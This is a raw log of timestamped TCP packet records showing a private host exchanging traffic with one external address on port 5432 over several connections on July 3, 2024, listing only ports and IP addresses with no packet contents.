Jul 3, 2024 02:22:25.825036049 CEST	49164	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:25.825376987 CEST	49166	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:25.830156088 CEST	5432	49166	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:26.487142086 CEST	5432	49166	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:26.487298965 CEST	49166	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:26.487937927 CEST	49166	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:26.489613056 CEST	49166	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:26.498239040 CEST	5432	49166	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:26.501107931 CEST	5432	49166	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:27.161887884 CEST	5432	49166	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:27.161942959 CEST	5432	49166	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:27.161951065 CEST	5432	49166	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:27.162035942 CEST	5432	49166	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:27.162045956 CEST	5432	49166	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:27.162051916 CEST	5432	49166	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:27.162094116 CEST	49166	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:27.162094116 CEST	49166	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:27.162180901 CEST	49166	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:27.163070917 CEST	49165	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:27.168128014 CEST	5432	49165	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:27.168179989 CEST	49165	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:27.177336931 CEST	49167	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:27.182142973 CEST	5432	49167	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:27.182243109 CEST	49167	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:27.182579994 CEST	49167	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:27.187428951 CEST	5432	49167	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:27.866096973 CEST	5432	49167	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:27.866302967 CEST	49167	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:27.866899967 CEST	49167	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:27.868452072 CEST	49167	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:27.871735096 CEST	5432	49167	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:27.873332024 CEST	5432	49167	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:28.530611038 CEST	5432	49167	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:28.530663967 CEST	49167	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:28.634864092 CEST	49166	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:28.643397093 CEST	5432	49166	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:28.643440962 CEST	49166	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:28.655785084 CEST	49168	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:28.660718918 CEST	5432	49168	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:28.660909891 CEST	49168	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:28.661343098 CEST	49168	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:28.666162014 CEST	5432	49168	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:29.308711052 CEST	5432	49168	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:29.308892012 CEST	49168	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:29.309525013 CEST	49168	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:29.311234951 CEST	49168	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:29.311321020 CEST	49168	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:29.314323902 CEST	5432	49168	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:29.316029072 CEST	5432	49168	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:29.316076040 CEST	49168	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:29.316236019 CEST	5432	49168	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:29.316286087 CEST	49168	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:29.320944071 CEST	5432	49168	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:29.321022034 CEST	49168	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:29.321377039 CEST	5432	49168	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:29.321386099 CEST	5432	49168	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:29.325898886 CEST	5432	49168	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:29.634977102 CEST	49167	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:29.640252113 CEST	5432	49167	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:29.640304089 CEST	49167	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:29.651361942 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:29.656192064 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:29.656260014 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:29.656613111 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:29.661374092 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.041429043 CEST	5432	49168	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.041506052 CEST	49168	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.308895111 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.308974981 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.309700012 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.311260939 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.314568996 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.316576004 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.640197992 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.640219927 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.640230894 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.640239954 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.640250921 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.640259981 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.640260935 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.640271902 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.640275002 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.640281916 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.640288115 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.640291929 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.640299082 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.640300989 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.640312910 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.640317917 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.640317917 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.640346050 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.640423059 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.645240068 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.645273924 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.645313025 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.645323038 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.645366907 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.730617046 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.730675936 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.730750084 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.730793953 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.735635042 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.735672951 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.735682964 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.735712051 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.735727072 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.739070892 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.739080906 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.739090919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.739118099 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.739128113 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.745629072 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.745707989 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.745707989 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.745726109 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.745733976 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.745747089 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.745754957 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.745764971 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.752525091 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.752536058 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.752547026 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.752590895 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.759219885 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.759227991 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.759269953 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.759299040 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.759308100 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.759346962 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.765809059 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.765820026 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.765829086 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.765855074 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.765866995 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.772428036 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.772461891 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.772502899 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.772555113 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.772562981 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.772603035 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.779169083 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.779177904 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.779186964 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.779213905 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.779223919 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.785809040 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.785844088 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.785878897 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.785893917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.785913944 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.785939932 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.785950899 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.792619944 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.792629004 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.792673111 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.826404095 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.826416969 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.826432943 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.826446056 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.826455116 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.826478958 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.826508045 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.831393003 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.831410885 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.831419945 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.831443071 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.831453085 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.834877968 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.834888935 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.834897995 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.834944963 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.834945917 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.841592073 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.841636896 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.841645956 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.841758013 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.848412991 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.848423004 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.848440886 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.848449945 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.848474979 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.848491907 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.856753111 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.856762886 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.856771946 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.856811047 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.856822968 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.861665964 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.861675978 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.861685991 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.861720085 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.861732006 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.868434906 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.868472099 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.868485928 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.868511915 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.868522882 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.874687910 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.874696970 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.874706984 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.874751091 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.874766111 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.880732059 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.880743027 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.880752087 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.880788088 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.880799055 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.886465073 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.886482954 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.886492014 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.886517048 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.886527061 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.891830921 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.891839981 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.891880989 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.894459009 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.894504070 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.894648075 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.894684076 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.894845963 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.894885063 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.894912004 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.894952059 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.899728060 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.899776936 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.899806976 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.899816036 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.899843931 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.904397011 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.904441118 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.904450893 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.904467106 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.904491901 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.909131050 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.909141064 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.909149885 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.909182072 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.909190893 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.914035082 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.914045095 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.914053917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.914081097 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.914092064 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.918936014 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.918962002 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.918987989 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.918998003 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.919007063 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.919050932 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.923583984 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.923634052 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.923644066 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.923652887 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.923661947 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.923685074 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.923696041 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.928422928 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.928469896 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.928493023 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.928500891 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.928525925 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.928534031 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.928560019 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.931462049 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.931505919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.931524992 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.931534052 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.931550980 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.931560040 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.931586981 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.931595087 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.934693098 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.934703112 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.934711933 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.934743881 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.934752941 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.937596083 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.937606096 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.937616110 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.937649012 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.940692902 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.940701962 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.940711021 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.940746069 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.940746069 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.943787098 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.943795919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.943804979 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.943842888 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.943852901 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.946789980 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.946799040 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.946809053 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.946837902 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.946846962 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.949892044 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.949908018 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.949917078 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.949942112 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.949951887 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.952941895 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.953000069 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.953008890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.953010082 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.953037977 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.953047037 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.955928087 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.955936909 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.955945969 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.955970049 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.955979109 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.958951950 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.958962917 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.958971977 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.959095001 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.961939096 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.961950064 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.961957932 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.961991072 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.962001085 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.964916945 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.964926958 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.964970112 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:30.964999914 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.965038061 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:30.965039968 CEST	49169	5432	192.168.2.22	116.202.180.70
